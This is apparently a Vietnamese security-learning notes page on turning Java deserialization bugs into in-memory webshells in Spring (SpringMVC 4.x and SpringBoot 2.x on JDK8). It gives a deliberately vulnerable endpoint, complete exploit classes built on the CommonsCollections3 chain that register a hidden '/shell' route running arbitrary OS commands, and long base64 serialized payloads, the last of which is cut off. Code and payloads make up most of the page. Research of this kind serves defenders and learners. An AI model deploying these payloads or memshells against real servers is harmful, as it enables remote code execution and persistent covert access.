🐸
endy's notes
  • 👋Welcome
  • 💁Blog linh tinh
    • HTB CPTS - review linh tinh
  • 🥷Red Teaming
    • HackTheBox Writeup
      • Web Challanges
      • Machine
    • Priv Escalation
      • 🪟Windows Priv Escalation
        • Windows User Privileges
        • Windows Built-in Groups
        • Attacking the OS
        • Credential Theft
        • Others Techniques
      • 🐧Linux Priv Escalation
    • C2
      • Sliver
    • Active Directory
      • Enumeration
      • Credentials Access
        • Kerberoasting
        • ASREPRoasting
        • DCSync
      • ACL Abuse
        • Khái niệm cơ bản
        • ACL Enumeration
        • Abuse some ACL
      • AD Trust
        • Khái niệm cơ bản
        • Enum AD Trust
        • Attack Child -> Parent Trusts
        • Attack Cross-Forest Trust
    • Lateral Movement
      • Cheatsheet
      • Lateral Movement 101
        • Impacket
        • Windows component
  • 🕸️Web Security
    • XS Leak
    • Java Sec Learn
      • Java Memory shell
        • General
        • Memshell in Tomcat
        • Deserialize to memshell in Tomcat
        • Memshell in Spring
        • Deserialize to memshell in Spring
        • Java Agent Memshell - Demo inject memshell in Jira
    • .Net Sec Learn
      • 🔀.NET Deserialize
        • Làm quen với .NET Serialization
        • Serializer - XmlSerializer và ObjectDataProvider chain
        • Formatter - một vài chain của BinaryFormatter
        • LosFormatter - ViewState deserialize
  • ⛳CTF Writeups
    • Writeup KMA CTF 2024
    • TetCTF2024
      • Hello from API GW (100)
      • Microservices (200)
      • LordGPT
      • X Ét Ét
    • SVATT Cấp học viện 2023
    • KMA CTF 2023
    • TetCTF 2023
    • DiceCTF 2023
Powered by GitBook
On this page
  • 1. Preface
  • 2. Deser2memshell trong Spring với JDK8
  • A. SpringMVC 4.x
  • B. SpringBoot 2.x
  • 3. Deser2memshell trong Spring với JDK17
  • 4. Refer
  1. Web Security
  2. Java Sec Learn
  3. Java Memory shell

Deserialize to memshell in Spring

Ở bài này mình sẽ note về leo memshell thông qua deserialize trong Spring

PreviousMemshell in SpringNextJava Agent Memshell - Demo inject memshell in Jira

Last updated 2 months ago

1. Preface

Trước khi đi vào thì mình note một xíu về JDK version. Các phiên bản Spring Framework 5.x trở đi thì Spring yêu cầu JDK8+, từ Spring Framework 6.x trở đi sẽ yêu cầu tối thiểu là JDK17 trở lên. Do đó ta sẽ có bảng sau:

JDK8+
JDK17+

Spring Boot 2.x

Spring Boot 3.x

SpringMVC 4.x

SpringMVC 6.x

Spring MVC 5.x

2. Deser2memshell trong Spring với JDK8

A. SpringMVC 4.x

Dựng môi trường demo

Tạo một project SpringMVC như bài trước nhưng lần này mình dùng JDK8 với SpringMVC 4.x

Thêm path deser

@ResponseBody
@RequestMapping(value = "/deser", method = RequestMethod.POST)
public String deser(@RequestParam("data") String data) {
    try {
        byte[] decodedData = Base64.getDecoder().decode(data);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decodedData))) {
            ois.readObject();
        }
    } catch (IOException | ClassNotFoundException e) {
        e.printStackTrace();
    }
    return "Done";
}

Mình sẽ exploit bằng chain CC3 nên ta import thêm commons-collections-3.2.1

<dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
</dependency>

Exploit

Vì trong Spring thì ta có thể get trực tiếp ApplicationContext để triển khai memshell, không giống như trong Tomcat phải tìm cách gọi được HttpServletRequest trong quá trình Runtime. Do đó việc exploit có phần đơn giản hơn nhiều

Mình sẽ dùng code gen payload CC3 như bài trước. Tuy nhiên sẽ chỉnh sửa class exploit lại 1 chút để load memshell như sau

// Cre: https://devme4f.github.io/posts/2023/quick-note-spring-memshell/

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

public class ExploitDeser2Mem extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers)
            throws TransletException {}

    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {}
    public ExploitDeser2Mem() throws Exception {
        super();
        try {
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
            RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);
            Method method = ExploitDeser2Mem.class.getDeclaredMethod("shell");
            PatternsRequestCondition url = new PatternsRequestCondition("/shell");
            RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
            RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
            r.registerMapping(info, new ExploitDeser2Mem("a"), method);
        } catch (Exception e) {}
    }

    public ExploitDeser2Mem(String a) {}

    public void shell() throws IOException {
        try {
            HttpServletRequest request = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest();
            HttpServletResponse response = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getResponse();

            String arg0 = request.getParameter("cmd");
            if (arg0 != null && request.getMethod().equals("POST")) {
                ProcessBuilder p;
                String o = "";
                PrintWriter w = response.getWriter();
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/bash", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                w.write(o);
                w.flush();
                w.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {}
    }
}

Nguyên nhân ta có thêm một constructor nhận String a nữa là vì trong quá trình exploit chain CC3 thì constructor của ExploitDeser2Mem được gọi. Payload inject memshell được thực thi, mà payload triển khai memshell cũng tạo instance của ExploitDeser2Mem -> cũng gọi đến constructor. Điều này tạo ra vòng loop vô tận làm quăng lỗi overflow, do đó ta cần thêm constructor thứ 2.

Ta sẽ có payload gen ra như sau

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl+woepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H+khtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAFlTK/rq+AAAANADrCgA7AHgKAHkAeggAewsAfAB9BwB+BwB/CwAFAIAHAIEIAGIHAIIKAAoAgwcAhAcAhQgAhgoADACHBwCIBwCJCgAQAIoHAIsKABMAjAgAYAoACACNCgAGAI4HAI8HAJAKABkAkQoAGQCSCACTCwCUAJULAJQAlggAlwoADQCYCACZCwCaAJsIAJwKAJ0AngoADQCfCACgCgANAKEHAKIIAKMIAKQKACgAhwgApQgApgcApwoAKACoCgCpAKoKAC4AqwgArAoALgCtCgAuAK4KAC4ArwoALgCwCgCxALIKALEAswoAsQCwCwCaALQHALUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAHkxvcmcvZXhhbXBsZS9FeHBsb2l0RGVzZXIyTWVtOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwC2AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYBAAdjb250ZXh0AQA3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAAXIBAFRMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL2Fubm90YXRpb24vUmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZzsBAAZtZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3VybAEASExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAAm1zAQBOTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247AQAEaW5mbwEAP0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEADVN0YWNrTWFwVGFibGUHAIEHAI8BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAFhAQASTGphdmEvbGFuZy9TdHJpbmc7AQAFc2hlbGwBAAFwAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAFvAQABdwEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABGFyZzAHALcHALgHAIUHALkHAKIHAKcHALoBAApTb3VyY2VGaWxlAQAVRXhwbG9pdERlc2VyMk1lbS5qYXZhDABOAE8HALsMALwAvQEAOW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLnNlcnZsZXQuRGlzcGF0Y2hlclNlcnZsZXQuQ09OVEVYVAcAvgwAvwDAAQA1b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQBAFJvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nDADBAMIBABxvcmcvZXhhbXBsZS9FeHBsb2l0RGVzZXIyTWVtAQAPamF2YS9sYW5nL0NsYXNzDADDAMQBAEZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uAQAQamF2YS9sYW5nL1N0cmluZwEABi9zaGVsbAwATgDFAQBMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbgEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWV0aG9kDABOAMYBAD1vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvDABOAMcMAE4AXwwAyADJAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAQG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMMAMoAywwAzADNAQADY21kBwC3DADOAM8MANAA0QEABFBPU1QMANIA0wEAAAcAuAwA1ADVAQAHb3MubmFtZQcA1gwA1wDPDADYANEBAAN3aW4MANkA2gEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAB2NtZC5leGUBAAIvYwEACS9iaW4vYmFzaAEAAi1jAQARamF2YS91dGlsL1NjYW5uZXIMANsA3AcA3QwA3gDfDABOAOABAAJcQQwA4QDiDADjAOQMAOUA0QwA5gBPBwC5DADnAF8MAOgATwwA6QDqAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEAOW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlcwEADGdldEF0dHJpYnV0ZQEAJyhMamF2YS9sYW5nL1N0cmluZztJKUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldEJlYW4BACUoTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9PYmplY3Q7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEAOyhbTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9SZXF1ZXN0TWV0aG9kOylWAQH2KExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUGFyYW1zUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL0hlYWRlcnNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUHJvZHVjZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb24vUmVxdWVzdENvbmRpdGlvbjspVgEAD3JlZ2lzdGVyTWFwcGluZwEAQShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOylWAQAKZ2V0UmVxdWVzdAEAKSgpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQALZ2V0UmVzcG9uc2UBACooKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldE1ldGhvZAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEABWNsb3NlAQAFd3JpdGUBAAVmbHVzaAEACXNlbmRFcnJvcgEABChJKVYAIQAIADsAAAAAAAUAAQA8AD0AAgA+AAAAPwAAAAMAAAABsQAAAAIAPwAAAAYAAQAAABgAQAAAACAAAwAAAAEAQQBCAAAAAAABAEMARAABAAAAAQBFAEYAAgBHAAAABAABAEgAAQA8AEkAAgA+AAAASQAAAAQAAAABsQAAAAIAPwAAAAYAAQAAABsAQAAAACoABAAAAAEAQQBCAAAAAAABAEMARAABAAAAAQBKAEsAAgAAAAEATABNAAMARwAAAAQAAQBIAAEATgBPAAIAPgAAARkACQAHAAAAcSq3AAG4AAISAwO5AAQDAMAABUwrEga5AAcCAMAABk0SCBIJA70ACrYAC067AAxZBL0ADVkDEg5TtwAPOgS7ABBZA70AEbcAEjoFuwATWRkEGQUBAQEBAbcAFDoGLBkGuwAIWRIVtwAWLbYAF6cABEyxAAEABABsAG8AGAADAD8AAAAqAAoAAAAdAAQAHwATACAAHwAhACsAIgA9ACMASgAkAFwAJQBsACYAcAAnAEAAAABIAAcAEwBZAFAAUQABAB8ATQBSAFMAAgArAEEAVABVAAMAPQAvAFYAVwAEAEoAIgBYAFkABQBcABAAWgBbAAYAAABxAEEAQgAAAFwAAAAQAAL/AG8AAQcAXQABBwBeAABHAAAABAABABgAAQBOAF8AAQA+AAAAOQABAAIAAAAFKrcAAbEAAAACAD8AAAAGAAEAAAApAEAAAAAWAAIAAAAFAEEAQgAAAAAABQBgAGEAAQABAGIATwACAD4AAAICAAYACAAAANW4AALAABm2ABpMuAACwAAZtgAbTSsSHLkAHQIATi3GAKkruQAeAQASH7YAIJkAmxIhOgUsuQAiAQA6BhIjuAAktgAlEia2ACeZACG7AChZBr0ADVkDEilTWQQSKlNZBS1TtwArOgSnAB67AChZBr0ADVkDEixTWQQSLVNZBS1TtwArOgS7AC5ZGQS2AC+2ADC3ADESMrYAMzoHGQe2ADSZAAsZB7YANacABRkFOgUZB7YANhkGGQW2ADcZBrYAOBkGtgA5pwAMLBEBlLkAOgIApwAETLEAAQAAANAA0wAYAAMAPwAAAE4AEwAAAC0ACgAuABQAMAAdADEALwAzADMANAA7ADUASwA2AGkAOACEADoAmgA7AK4APACzAD0AugA+AL8APwDEAEAAxwBBANAAQwDUAEQAQAAAAFwACQBmAAMAYwBkAAQAhABAAGMAZAAEADMAkQBlAGEABQA7AIkAZgBnAAYAmgAqAGgAaQAHAAoAxgBqAGsAAQAUALwAbABtAAIAHQCzAG4AYQADAAAA1QBBAEIAAABcAAAAXQAI/wBpAAcHAF0HAG8HAHAHAHEABwBxBwByAAD/ABoABwcAXQcAbwcAcAcAcQcAcwcAcQcAcgAA/AAlBwB0QQcAcf8AGgAEBwBdBwBvBwBwBwBxAAD4AAhCBwBeAABHAAAABAABAHUAAQB2AAAAAgB3cHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+AC0=

Tiến hành inject

Kết quả

B. SpringBoot 2.x

Dựng môi trường demo

Tạo một project SpringBoot như bài trước nhưng lần này mình dùng JDK8 với SpringBoot 2.x

Mình dùng phiên bản 2.7.6, nếu dùng verion trước 2.6 thì modify payload lại xíu như mình đề cập bài trước.

Cuối cùng thêm path để deser cũng như trên

Exploit

Mình sẽ có class exploit như sau

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import org.springframework.web.servlet.support.RequestContextUtils;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

public class ExploitDeser2MemStringBoot extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers)
            throws TransletException {}

    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {}
    public ExploitDeser2MemStringBoot() throws Exception {
        super();
        try {
            WebApplicationContext context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest());
            RequestMappingHandlerMapping mappingHandler = context.getBean(RequestMappingHandlerMapping.class);
            Method method = ExploitDeser2MemStringBoot.class.getMethod("run");
            Method getMappingForMethod = mappingHandler.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);
            getMappingForMethod.setAccessible(true);

            RequestMappingInfo mInfo = (RequestMappingInfo) getMappingForMethod.invoke(mappingHandler, method, ExploitDeser2MemStringBoot.class);
            ExploitDeser2MemStringBoot obj = new ExploitDeser2MemStringBoot();
            mappingHandler.registerMapping(mInfo, obj, method);
        } catch (Exception e) {}
    }

    public ExploitDeser2MemStringBoot(String a) {}

    @RequestMapping("/shell")
    public void run() throws IOException {
        try {
            HttpServletRequest request = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest();
            HttpServletResponse response = ((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getResponse();

            String arg0 = request.getParameter("cmd");
            if (arg0 != null && request.getMethod().equals("POST")) {
                ProcessBuilder p;
                String o = "";
                PrintWriter w = response.getWriter();
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/bash", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                w.write(o);
                w.flush();
                w.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {}
    }
}

Ta sẽ có payload gen ra như sau

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl+woepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAA